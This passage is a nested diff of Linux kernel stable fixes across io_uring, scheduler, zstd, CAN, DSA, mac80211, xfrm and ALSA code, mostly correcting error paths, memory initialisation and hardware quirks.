+@@ -668,6 +669,10 @@ acpi_quirk_skip_serdev_enumeration(struct device *controller_parent, bool *skip)
+ 	*skip = false;
+ 	return 0;
+ }
++static inline bool acpi_quirk_skip_gpio_event_handlers(void)
++{
++	return false;
++}
+ #endif
+ 
+ #ifdef CONFIG_PM
+diff --git a/include/trace/events/rcu.h b/include/trace/events/rcu.h
+index 90b2fb0292cb1..012fa0d171b27 100644
+--- a/include/trace/events/rcu.h
++++ b/include/trace/events/rcu.h
+@@ -768,7 +768,7 @@ TRACE_EVENT_RCU(rcu_torture_read,
+ 	TP_ARGS(rcutorturename, rhp, secs, c_old, c),
+ 
+ 	TP_STRUCT__entry(
+-		__field(char, rcutorturename[RCUTORTURENAME_LEN])
++		__array(char, rcutorturename, RCUTORTURENAME_LEN)
+ 		__field(struct rcu_head *, rhp)
+ 		__field(unsigned long, secs)
+ 		__field(unsigned long, c_old)
+diff --git a/include/xen/interface/platform.h b/include/xen/interface/platform.h
+index 655d92e803e14..79a443c65ea93 100644
+--- a/include/xen/interface/platform.h
++++ b/include/xen/interface/platform.h
+@@ -483,6 +483,8 @@ struct xenpf_symdata {
+ };
+ DEFINE_GUEST_HANDLE_STRUCT(xenpf_symdata);
+ 
++#define XENPF_get_dom0_console 64
++
+ struct xen_platform_op {
+ 	uint32_t cmd;
+ 	uint32_t interface_version; /* XENPF_INTERFACE_VERSION */
+@@ -506,6 +508,7 @@ struct xen_platform_op {
+ 		struct xenpf_mem_hotadd        mem_add;
+ 		struct xenpf_core_parking      core_parking;
+ 		struct xenpf_symdata           symdata;
++		struct dom0_vga_console_info   dom0_console;
+ 		uint8_t                        pad[128];
+ 	} u;
+ };
+diff --git a/io_uring/alloc_cache.h b/io_uring/alloc_cache.h
+index 729793ae97127..c2cde88aeed53 100644
+--- a/io_uring/alloc_cache.h
++++ b/io_uring/alloc_cache.h
+@@ -27,6 +27,7 @@ static inline struct io_cache_entry *io_alloc_cache_get(struct io_alloc_cache *c
+ 		struct hlist_node *node = cache->list.first;
+ 
+ 		hlist_del(node);
++		cache->nr_cached--;
+ 		return container_of(node, struct io_cache_entry, node);
+ 	}
+ 
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index fea739eef56f4..666666ab2e73d 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -724,6 +724,7 @@ int io_arm_poll_handler(struct io_kiocb *req, unsigned issue_flags)
+ 	apoll = io_req_alloc_apoll(req, issue_flags);
+ 	if (!apoll)
+ 		return IO_APOLL_ABORTED;
++	req->flags &= ~(REQ_F_SINGLE_POLL | REQ_F_DOUBLE_POLL);
+ 	req->flags |= REQ_F_POLLED;
+ 	ipt.pt._qproc = io_async_queue_proc;
+ 
+diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
+index 2b8743645efcb..f27f4975217d9 100644
+--- a/io_uring/rsrc.h
++++ b/io_uring/rsrc.h
+@@ -144,15 +144,13 @@ static inline void io_req_set_rsrc_node(struct io_kiocb *req,
+ 					unsigned int issue_flags)
+ {
+ 	if (!req->rsrc_node) {
+-		req->rsrc_node = ctx->rsrc_node;
++		io_ring_submit_lock(ctx, issue_flags);
+ 
+-		if (!(issue_flags & IO_URING_F_UNLOCKED)) {
+-			lockdep_assert_held(&ctx->uring_lock);
++		lockdep_assert_held(&ctx->uring_lock);
+ 
+-			io_charge_rsrc_node(ctx);
+-		} else {
+-			percpu_ref_get(&req->rsrc_node->refs);
+-		}
++		req->rsrc_node = ctx->rsrc_node;
++		io_charge_rsrc_node(ctx);
++		io_ring_submit_unlock(ctx, issue_flags);
+ 	}
+ }
+ 
+diff --git a/kernel/compat.c b/kernel/compat.c
+index 55551989d9da5..fb50f29d9b361 100644
+--- a/kernel/compat.c
++++ b/kernel/compat.c
+@@ -152,7 +152,7 @@ COMPAT_SYSCALL_DEFINE3(sched_getaffinity, compat_pid_t,  pid, unsigned int, len,
+ 	if (len & (sizeof(compat_ulong_t)-1))
+ 		return -EINVAL;
+ 
+-	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	ret = sched_getaffinity(pid, mask);
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 9a0698353d60f..57d84b534cdea 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -8404,14 +8404,14 @@ SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
+ 	if (len & (sizeof(unsigned long)-1))
+ 		return -EINVAL;
+ 
+-	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	ret = sched_getaffinity(pid, mask);
+ 	if (ret == 0) {
+ 		unsigned int retlen = min(len, cpumask_size());
+ 
+-		if (copy_to_user(user_mask_ptr, mask, retlen))
++		if (copy_to_user(user_mask_ptr, cpumask_bits(mask), retlen))
+ 			ret = -EFAULT;
+ 		else
+ 			ret = retlen;
+diff --git a/kernel/trace/kprobe_event_gen_test.c b/kernel/trace/kprobe_event_gen_test.c
+index c736487fc0e48..e0c420eb0b2b4 100644
+--- a/kernel/trace/kprobe_event_gen_test.c
++++ b/kernel/trace/kprobe_event_gen_test.c
+@@ -146,7 +146,7 @@ static int __init test_gen_kprobe_cmd(void)
+ 	if (trace_event_file_is_valid(gen_kprobe_test))
+ 		gen_kprobe_test = NULL;
+ 	/* We got an error after creating the event, delete it */
+-	ret = kprobe_event_delete("gen_kprobe_test");
++	kprobe_event_delete("gen_kprobe_test");
+ 	goto out;
+ }
+ 
+@@ -211,7 +211,7 @@ static int __init test_gen_kretprobe_cmd(void)
+ 	if (trace_event_file_is_valid(gen_kretprobe_test))
+ 		gen_kretprobe_test = NULL;
+ 	/* We got an error after creating the event, delete it */
+-	ret = kprobe_event_delete("gen_kretprobe_test");
++	kprobe_event_delete("gen_kretprobe_test");
+ 	goto out;
+ }
+ 
+diff --git a/lib/zstd/common/zstd_deps.h b/lib/zstd/common/zstd_deps.h
+index 7a5bf44839c9c..f06df065dec01 100644
+--- a/lib/zstd/common/zstd_deps.h
++++ b/lib/zstd/common/zstd_deps.h
+@@ -84,7 +84,7 @@ static uint64_t ZSTD_div64(uint64_t dividend, uint32_t divisor) {
+ 
+ #include <linux/kernel.h>
+ 
+-#define assert(x) WARN_ON((x))
++#define assert(x) WARN_ON(!(x))
+ 
+ #endif /* ZSTD_DEPS_ASSERT */
+ #endif /* ZSTD_DEPS_NEED_ASSERT */
+diff --git a/lib/zstd/decompress/zstd_decompress.c b/lib/zstd/decompress/zstd_decompress.c
+index b9b935a9f5c0d..6b3177c947114 100644
+--- a/lib/zstd/decompress/zstd_decompress.c
++++ b/lib/zstd/decompress/zstd_decompress.c
+@@ -798,7 +798,7 @@ static size_t ZSTD_copyRawBlock(void* dst, size_t dstCapacity,
+         if (srcSize == 0) return 0;
+         RETURN_ERROR(dstBuffer_null, "");
+     }
+-    ZSTD_memcpy(dst, src, srcSize);
++    ZSTD_memmove(dst, src, srcSize);
+     return srcSize;
+ }
+ 
+@@ -858,6 +858,7 @@ static size_t ZSTD_decompressFrame(ZSTD_DCtx* dctx,
+ 
+     /* Loop on each block */
+     while (1) {
++        BYTE* oBlockEnd = oend;
+         size_t decodedSize;
+         blockProperties_t blockProperties;
+         size_t const cBlockSize = ZSTD_getcBlockSize(ip, remainingSrcSize, &blockProperties);
+@@ -867,16 +868,34 @@ static size_t ZSTD_decompressFrame(ZSTD_DCtx* dctx,
+         remainingSrcSize -= ZSTD_blockHeaderSize;
+         RETURN_ERROR_IF(cBlockSize > remainingSrcSize, srcSize_wrong, "");
+ 
++        if (ip >= op && ip < oBlockEnd) {
++            /* We are decompressing in-place. Limit the output pointer so that we
++             * don't overwrite the block that we are currently reading. This will
++             * fail decompression if the input & output pointers aren't spaced
++             * far enough apart.
++             *
++             * This is important to set, even when the pointers are far enough
++             * apart, because ZSTD_decompressBlock_internal() can decide to store
++             * literals in the output buffer, after the block it is decompressing.
++             * Since we don't want anything to overwrite our input, we have to tell
++             * ZSTD_decompressBlock_internal to never write past ip.
++             *
++             * See ZSTD_allocateLiteralsBuffer() for reference.
++             */
++            oBlockEnd = op + (ip - op);
++        }
++
+         switch(blockProperties.blockType)
+         {
+         case bt_compressed:
+-            decodedSize = ZSTD_decompressBlock_internal(dctx, op, (size_t)(oend-op), ip, cBlockSize, /* frame */ 1, not_streaming);
++            decodedSize = ZSTD_decompressBlock_internal(dctx, op, (size_t)(oBlockEnd-op), ip, cBlockSize, /* frame */ 1, not_streaming);
+             break;
+         case bt_raw :
++            /* Use oend instead of oBlockEnd because this function is safe to overlap. It uses memmove. */
+             decodedSize = ZSTD_copyRawBlock(op, (size_t)(oend-op), ip, cBlockSize);
+             break;
+         case bt_rle :
+-            decodedSize = ZSTD_setRleBlock(op, (size_t)(oend-op), *ip, blockProperties.origSize);
++            decodedSize = ZSTD_setRleBlock(op, (size_t)(oBlockEnd-op), *ip, blockProperties.origSize);
+             break;
+         case bt_reserved :
+         default:
+diff --git a/net/can/bcm.c b/net/can/bcm.c
+index 27706f6ace34a..a962ec2b8ba5b 100644
+--- a/net/can/bcm.c
++++ b/net/can/bcm.c
+@@ -941,6 +941,8 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 
+ 			cf = op->frames + op->cfsiz * i;
+ 			err = memcpy_from_msg((u8 *)cf, msg, op->cfsiz);
++			if (err < 0)
++				goto free_op;
+ 
+ 			if (op->flags & CAN_FD_FRAME) {
+ 				if (cf->len > 64)
+@@ -950,12 +952,8 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 					err = -EINVAL;
+ 			}
+ 
+-			if (err < 0) {
+-				if (op->frames != &op->sframe)
+-					kfree(op->frames);
+-				kfree(op);
+-				return err;
+-			}
++			if (err < 0)
++				goto free_op;
+ 
+ 			if (msg_head->flags & TX_CP_CAN_ID) {
+ 				/* copy can_id into frame */
+@@ -1026,6 +1024,12 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 		bcm_tx_start_timer(op);
+ 
+ 	return msg_head->nframes * op->cfsiz + MHSIZ;
++
++free_op:
++	if (op->frames != &op->sframe)
++		kfree(op->frames);
++	kfree(op);
++	return err;
+ }
+ 
+ /*
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index fce9b9ebf13f6..fb92c3609e172 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -1124,8 +1124,6 @@ static void __j1939_session_cancel(struct j1939_session *session,
+ 
+ 	if (session->sk)
+ 		j1939_sk_send_loop_abort(session->sk, session->err);
+-	else
+-		j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ }
+ 
+ static void j1939_session_cancel(struct j1939_session *session,
+@@ -1140,6 +1138,9 @@ static void j1939_session_cancel(struct j1939_session *session,
+ 	}
+ 
+ 	j1939_session_list_unlock(session->priv);
++
++	if (!session->sk)
++		j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ }
+ 
+ static enum hrtimer_restart j1939_tp_txtimer(struct hrtimer *hrtimer)
+@@ -1253,6 +1254,9 @@ static enum hrtimer_restart j1939_tp_rxtimer(struct hrtimer *hrtimer)
+ 			__j1939_session_cancel(session, J1939_XTP_ABORT_TIMEOUT);
+ 		}
+ 		j1939_session_list_unlock(session->priv);
++
++		if (!session->sk)
++			j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ 	}
+ 
+ 	j1939_session_put(session);
+diff --git a/net/dsa/slave.c b/net/dsa/slave.c
+index 6711ddc0a3c7d..df8b16c741a40 100644
+--- a/net/dsa/slave.c
++++ b/net/dsa/slave.c
+@@ -57,6 +57,12 @@ struct dsa_standalone_event_work {
+ 	u16 vid;
+ };
+ 
++struct dsa_host_vlan_rx_filtering_ctx {
++	struct net_device *dev;
++	const unsigned char *addr;
++	enum dsa_standalone_event event;
++};
++
+ static bool dsa_switch_supports_uc_filtering(struct dsa_switch *ds)
+ {
+ 	return ds->ops->port_fdb_add && ds->ops->port_fdb_del &&
+@@ -155,18 +161,37 @@ static int dsa_slave_schedule_standalone_work(struct net_device *dev,
+ 	return 0;
+ }
+ 
++static int dsa_slave_host_vlan_rx_filtering(struct net_device *vdev, int vid,
++					    void *arg)
++{
++	struct dsa_host_vlan_rx_filtering_ctx *ctx = arg;
++
++	return dsa_slave_schedule_standalone_work(ctx->dev, ctx->event,
++						  ctx->addr, vid);
++}
++
+ static int dsa_slave_sync_uc(struct net_device *dev,
+ 			     const unsigned char *addr)
+ {
+ 	struct net_device *master = dsa_slave_to_master(dev);
+ 	struct dsa_port *dp = dsa_slave_to_port(dev);
++	struct dsa_host_vlan_rx_filtering_ctx ctx = {
++		.dev = dev,
++		.addr = addr,
++		.event = DSA_UC_ADD,
++	};
++	int err;
+ 
+ 	dev_uc_add(master, addr);
+ 
+ 	if (!dsa_switch_supports_uc_filtering(dp->ds))
+ 		return 0;
+ 
+-	return dsa_slave_schedule_standalone_work(dev, DSA_UC_ADD, addr, 0);
++	err = dsa_slave_schedule_standalone_work(dev, DSA_UC_ADD, addr, 0);
++	if (err)
++		return err;
++
++	return vlan_for_each(dev, dsa_slave_host_vlan_rx_filtering, &ctx);
+ }
+ 
+ static int dsa_slave_unsync_uc(struct net_device *dev,
+@@ -174,13 +199,23 @@ static int dsa_slave_unsync_uc(struct net_device *dev,
+ {
+ 	struct net_device *master = dsa_slave_to_master(dev);
+ 	struct dsa_port *dp = dsa_slave_to_port(dev);
++	struct dsa_host_vlan_rx_filtering_ctx ctx = {
++		.dev = dev,
++		.addr = addr,
++		.event = DSA_UC_DEL,
++	};
++	int err;
+ 
+ 	dev_uc_del(master, addr);
+ 
+ 	if (!dsa_switch_supports_uc_filtering(dp->ds))
+ 		return 0;
+ 
+-	return dsa_slave_schedule_standalone_work(dev, DSA_UC_DEL, addr, 0);
++	err = dsa_slave_schedule_standalone_work(dev, DSA_UC_DEL, addr, 0);
++	if (err)
++		return err;
++
++	return vlan_for_each(dev, dsa_slave_host_vlan_rx_filtering, &ctx);
+ }
+ 
+ static int dsa_slave_sync_mc(struct net_device *dev,
+@@ -188,13 +223,23 @@ static int dsa_slave_sync_mc(struct net_device *dev,
+ {
+ 	struct net_device *master = dsa_slave_to_master(dev);
+ 	struct dsa_port *dp = dsa_slave_to_port(dev);
++	struct dsa_host_vlan_rx_filtering_ctx ctx = {
++		.dev = dev,
++		.addr = addr,
++		.event = DSA_MC_ADD,
++	};
++	int err;
+ 
+ 	dev_mc_add(master, addr);
+ 
+ 	if (!dsa_switch_supports_mc_filtering(dp->ds))
+ 		return 0;
+ 
+-	return dsa_slave_schedule_standalone_work(dev, DSA_MC_ADD, addr, 0);
++	err = dsa_slave_schedule_standalone_work(dev, DSA_MC_ADD, addr, 0);
++	if (err)
++		return err;
++
++	return vlan_for_each(dev, dsa_slave_host_vlan_rx_filtering, &ctx);
+ }
+ 
+ static int dsa_slave_unsync_mc(struct net_device *dev,
+@@ -202,13 +247,23 @@ static int dsa_slave_unsync_mc(struct net_device *dev,
+ {
+ 	struct net_device *master = dsa_slave_to_master(dev);
+ 	struct dsa_port *dp = dsa_slave_to_port(dev);
++	struct dsa_host_vlan_rx_filtering_ctx ctx = {
++		.dev = dev,
++		.addr = addr,
++		.event = DSA_MC_DEL,
++	};
++	int err;
+ 
+ 	dev_mc_del(master, addr);
+ 
+ 	if (!dsa_switch_supports_mc_filtering(dp->ds))
+ 		return 0;
+ 
+-	return dsa_slave_schedule_standalone_work(dev, DSA_MC_DEL, addr, 0);
++	err = dsa_slave_schedule_standalone_work(dev, DSA_MC_DEL, addr, 0);
++	if (err)
++		return err;
++
++	return vlan_for_each(dev, dsa_slave_host_vlan_rx_filtering, &ctx);
+ }
+ 
+ void dsa_slave_sync_ha(struct net_device *dev)
+@@ -1668,6 +1723,8 @@ static int dsa_slave_vlan_rx_add_vid(struct net_device *dev, __be16 proto,
+ 		.flags = 0,
+ 	};
+ 	struct netlink_ext_ack extack = {0};
++	struct dsa_switch *ds = dp->ds;
++	struct netdev_hw_addr *ha;
+ 	int ret;
+ 
+ 	/* User port... */
+@@ -1687,6 +1744,30 @@ static int dsa_slave_vlan_rx_add_vid(struct net_device *dev, __be16 proto,
+ 		return ret;
+ 	}
+ 
++	if (!dsa_switch_supports_uc_filtering(ds) &&
++	    !dsa_switch_supports_mc_filtering(ds))
++		return 0;
++
++	netif_addr_lock_bh(dev);
++
++	if (dsa_switch_supports_mc_filtering(ds)) {
++		netdev_for_each_synced_mc_addr(ha, dev) {
++			dsa_slave_schedule_standalone_work(dev, DSA_MC_ADD,
++							   ha->addr, vid);
++		}
++	}
++
++	if (dsa_switch_supports_uc_filtering(ds)) {
++		netdev_for_each_synced_uc_addr(ha, dev) {
++			dsa_slave_schedule_standalone_work(dev, DSA_UC_ADD,
++							   ha->addr, vid);
++		}
++	}
++
++	netif_addr_unlock_bh(dev);
++
++	dsa_flush_workqueue();
++
+ 	return 0;
+ }
+ 
+@@ -1699,13 +1780,43 @@ static int dsa_slave_vlan_rx_kill_vid(struct net_device *dev, __be16 proto,
+ 		/* This API only allows programming tagged, non-PVID VIDs */
+ 		.flags = 0,
+ 	};
++	struct dsa_switch *ds = dp->ds;
++	struct netdev_hw_addr *ha;
+ 	int err;
+ 
+ 	err = dsa_port_vlan_del(dp, &vlan);
+ 	if (err)
+ 		return err;
+ 
+-	return dsa_port_host_vlan_del(dp, &vlan);
++	err = dsa_port_host_vlan_del(dp, &vlan);
++	if (err)
++		return err;
++
++	if (!dsa_switch_supports_uc_filtering(ds) &&
++	    !dsa_switch_supports_mc_filtering(ds))
++		return 0;
++
++	netif_addr_lock_bh(dev);
++
++	if (dsa_switch_supports_mc_filtering(ds)) {
++		netdev_for_each_synced_mc_addr(ha, dev) {
++			dsa_slave_schedule_standalone_work(dev, DSA_MC_DEL,
++							   ha->addr, vid);
++		}
++	}
++
++	if (dsa_switch_supports_uc_filtering(ds)) {
++		netdev_for_each_synced_uc_addr(ha, dev) {
++			dsa_slave_schedule_standalone_work(dev, DSA_UC_DEL,
++							   ha->addr, vid);
++		}
++	}
++
++	netif_addr_unlock_bh(dev);
++
++	dsa_flush_workqueue();
++
++	return 0;
+ }
+ 
+ static int dsa_slave_restore_vlan(struct net_device *vdev, int vid, void *arg)
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index 00db74d96583d..b77f1189d19d1 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -415,7 +415,7 @@ void hsr_addr_subst_dest(struct hsr_node *node_src, struct sk_buff *skb,
+ 	node_dst = find_node_by_addr_A(&port->hsr->node_db,
+ 				       eth_hdr(skb)->h_dest);
+ 	if (!node_dst) {
+-		if (net_ratelimit())
++		if (port->hsr->prot_version != PRP_V1 && net_ratelimit())
+ 			netdev_err(skb->dev, "%s: Unknown node\n", __func__);
+ 		return;
+ 	}
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index d611e15301839..e24d2d5b04ad0 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -2576,6 +2576,17 @@ static int ieee80211_change_bss(struct wiphy *wiphy,
+ 	if (!sband)
+ 		return -EINVAL;
+ 
++	if (params->basic_rates) {
++		if (!ieee80211_parse_bitrates(link->conf->chandef.width,
++					      wiphy->bands[sband->band],
++					      params->basic_rates,
++					      params->basic_rates_len,
++					      &link->conf->basic_rates))
++			return -EINVAL;
++		changed |= BSS_CHANGED_BASIC_RATES;
++		ieee80211_check_rate_mask(link);
++	}
++
+ 	if (params->use_cts_prot >= 0) {
+ 		link->conf->use_cts_prot = params->use_cts_prot;
+ 		changed |= BSS_CHANGED_ERP_CTS_PROT;
+@@ -2597,16 +2608,6 @@ static int ieee80211_change_bss(struct wiphy *wiphy,
+ 		changed |= BSS_CHANGED_ERP_SLOT;
+ 	}
+ 
+-	if (params->basic_rates) {
+-		ieee80211_parse_bitrates(link->conf->chandef.width,
+-					 wiphy->bands[sband->band],
+-					 params->basic_rates,
+-					 params->basic_rates_len,
+-					 &link->conf->basic_rates);
+-		changed |= BSS_CHANGED_BASIC_RATES;
+-		ieee80211_check_rate_mask(link);
+-	}
+-
+ 	if (params->ap_isolate >= 0) {
+ 		if (params->ap_isolate)
+ 			sdata->flags |= IEEE80211_SDATA_DONT_BRIDGE_PACKETS;
+diff --git a/net/sunrpc/xprtsock.c b/net/sunrpc/xprtsock.c
+index aaa5b2741b79d..1b9465b43997c 100644
+--- a/net/sunrpc/xprtsock.c
++++ b/net/sunrpc/xprtsock.c
+@@ -2155,6 +2155,7 @@ static void xs_tcp_shutdown(struct rpc_xprt *xprt)
+ 	switch (skst) {
+ 	case TCP_FIN_WAIT1:
+ 	case TCP_FIN_WAIT2:
++	case TCP_LAST_ACK:
+ 		break;
+ 	case TCP_ESTABLISHED:
+ 	case TCP_CLOSE_WAIT:
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index cf5172d4ce68c..103af2b3e986f 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -1012,7 +1012,9 @@ static int copy_to_user_aead(struct xfrm_algo_aead *aead, struct sk_buff *skb)
+ 		return -EMSGSIZE;
+ 
+ 	ap = nla_data(nla);
+-	memcpy(ap, aead, sizeof(*aead));
++	strscpy_pad(ap->alg_name, aead->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = aead->alg_key_len;
++	ap->alg_icv_len = aead->alg_icv_len;
+ 
+ 	if (redact_secret && aead->alg_key_len)
+ 		memset(ap->alg_key, 0, (aead->alg_key_len + 7) / 8);
+@@ -1032,7 +1034,8 @@ static int copy_to_user_ealg(struct xfrm_algo *ealg, struct sk_buff *skb)
+ 		return -EMSGSIZE;
+ 
+ 	ap = nla_data(nla);
+-	memcpy(ap, ealg, sizeof(*ealg));
++	strscpy_pad(ap->alg_name, ealg->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = ealg->alg_key_len;
+ 
+ 	if (redact_secret && ealg->alg_key_len)
+ 		memset(ap->alg_key, 0, (ealg->alg_key_len + 7) / 8);
+@@ -1043,6 +1046,40 @@ static int copy_to_user_ealg(struct xfrm_algo *ealg, struct sk_buff *skb)
+ 	return 0;
+ }
+ 
++static int copy_to_user_calg(struct xfrm_algo *calg, struct sk_buff *skb)
++{
++	struct nlattr *nla = nla_reserve(skb, XFRMA_ALG_COMP, sizeof(*calg));
++	struct xfrm_algo *ap;
++
++	if (!nla)
++		return -EMSGSIZE;
++
++	ap = nla_data(nla);
++	strscpy_pad(ap->alg_name, calg->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = 0;
++
++	return 0;
++}
++
++static int copy_to_user_encap(struct xfrm_encap_tmpl *ep, struct sk_buff *skb)
++{
++	struct nlattr *nla = nla_reserve(skb, XFRMA_ENCAP, sizeof(*ep));
++	struct xfrm_encap_tmpl *uep;
++
++	if (!nla)
++		return -EMSGSIZE;
++
++	uep = nla_data(nla);
++	memset(uep, 0, sizeof(*uep));
++
++	uep->encap_type = ep->encap_type;
++	uep->encap_sport = ep->encap_sport;
++	uep->encap_dport = ep->encap_dport;
++	uep->encap_oa = ep->encap_oa;
++
++	return 0;
++}
++
+ static int xfrm_smark_put(struct sk_buff *skb, struct xfrm_mark *m)
+ {
+ 	int ret = 0;
+@@ -1098,12 +1135,12 @@ static int copy_to_user_state_extra(struct xfrm_state *x,
+ 			goto out;
+ 	}
+ 	if (x->calg) {
+-		ret = nla_put(skb, XFRMA_ALG_COMP, sizeof(*(x->calg)), x->calg);
++		ret = copy_to_user_calg(x->calg, skb);
+ 		if (ret)
+ 			goto out;
+ 	}
+ 	if (x->encap) {
+-		ret = nla_put(skb, XFRMA_ENCAP, sizeof(*x->encap), x->encap);
++		ret = copy_to_user_encap(x->encap, skb);
+ 		if (ret)
+ 			goto out;
+ 	}
+diff --git a/scripts/mod/modpost.c b/scripts/mod/modpost.c
+index efff8078e3958..9466b6a2abae4 100644
+--- a/scripts/mod/modpost.c
++++ b/scripts/mod/modpost.c
+@@ -1733,7 +1733,7 @@ static void extract_crcs_for_object(const char *object, struct module *mod)
+ 		if (!isdigit(*p))
+ 			continue;	/* skip this line */
+ 
+-		crc = strtol(p, &p, 0);
++		crc = strtoul(p, &p, 0);
+ 		if (*p != '\n')
+ 			continue;	/* skip this line */
+ 
+diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c
+index 8b6aeb8a78f7d..02fd65993e7e5 100644
+--- a/sound/core/pcm_lib.c
++++ b/sound/core/pcm_lib.c
+@@ -2155,6 +2155,8 @@ int pcm_lib_apply_appl_ptr(struct snd_pcm_substream *substream,
+ 		ret = substream->ops->ack(substream);
+ 		if (ret < 0) {
+ 			runtime->control->appl_ptr = old_appl_ptr;
++			if (ret == -EPIPE)
++				__snd_pcm_xrun(substream);
+ 			return ret;
+ 		}
+ 	}
+diff --git a/sound/pci/asihpi/hpi6205.c b/sound/pci/asihpi/hpi6205.c
+index 27e11b5f70b97..c7d7eff86727f 100644
+--- a/sound/pci/asihpi/hpi6205.c
++++ b/sound/pci/asihpi/hpi6205.c
+@@ -430,7 +430,7 @@ void HPI_6205(struct hpi_message *phm, struct hpi_response *phr)
+ 		pao = hpi_find_adapter(phm->adapter_index);
+ 	} else {
+ 		/* subsys messages don't address an adapter */
+-		_HPI_6205(NULL, phm, phr);
++		phr->error = HPI_ERROR_INVALID_OBJ_INDEX;
+ 		return;
+ 	}
+ 
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index acde4cd58785e..099722ebaed83 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -4228,8 +4228,10 @@ static int tuning_ctl_set(struct hda_codec *codec, hda_nid_t nid,
+ 
+ 	for (i = 0; i < TUNING_CTLS_COUNT; i++)
+ 		if (nid == ca0132_tuning_ctls[i].nid)
+-			break;
++			goto found;
+ 
++	return -EINVAL;
++found:
+ 	snd_hda_power_up(codec);
+ 	dspio_set_param(codec, ca0132_tuning_ctls[i].mid, 0x20,
+ 			ca0132_tuning_ctls[i].req,
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index 75e1d00074b9f..a889cccdd607c 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -980,7 +980,10 @@ static const struct snd_pci_quirk cxt5066_fixups[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3905, "Lenovo G50-30", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x390b, "Lenovo G50-80", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3975, "Lenovo U300s", CXT_FIXUP_STEREO_DMIC),
+-	SND_PCI_QUIRK(0x17aa, 0x3977, "Lenovo IdeaPad U310", CXT_PINCFG_LENOVO_NOTEBOOK),
++	/* NOTE: we'd need to extend the quirk for 17aa:3977 as the same
++	 * PCI SSID is used on multiple Lenovo models
++	 */
++	SND_PCI_QUIRK(0x17aa, 0x3977, "Lenovo IdeaPad U310", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3978, "Lenovo G50-70", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x397b, "Lenovo S205", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK_VENDOR(0x17aa, "Thinkpad", CXT_FIXUP_THINKPAD_ACPI),
+@@ -1003,6 +1006,7 @@ static const struct hda_model_fixup cxt5066_fixup_models[] = {
+ 	{ .id = CXT_FIXUP_MUTE_LED_GPIO, .name = "mute-led-gpio" },
+ 	{ .id = CXT_FIXUP_HP_ZBOOK_MUTE_LED, .name = "hp-zbook-mute-led" },
+ 	{ .id = CXT_FIXUP_HP_MIC_NO_PRESENCE, .name = "hp-mic-fix" },
++	{ .id = CXT_PINCFG_LENOVO_NOTEBOOK, .name = "lenovo-20149" },
+ 	{}
+ };
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 28ac6c159b2a2..070150bbd3559 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -2631,6 +2631,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x65e5, "Clevo PC50D[PRS](?:-D|-G)?", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65f1, "Clevo PC50HS", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65f5, "Clevo PD50PN[NRT]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
++	SND_PCI_QUIRK(0x1558, 0x66a2, "Clevo PE60RNE", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67d1, "Clevo PB71[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67e1, "Clevo PB71[DE][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
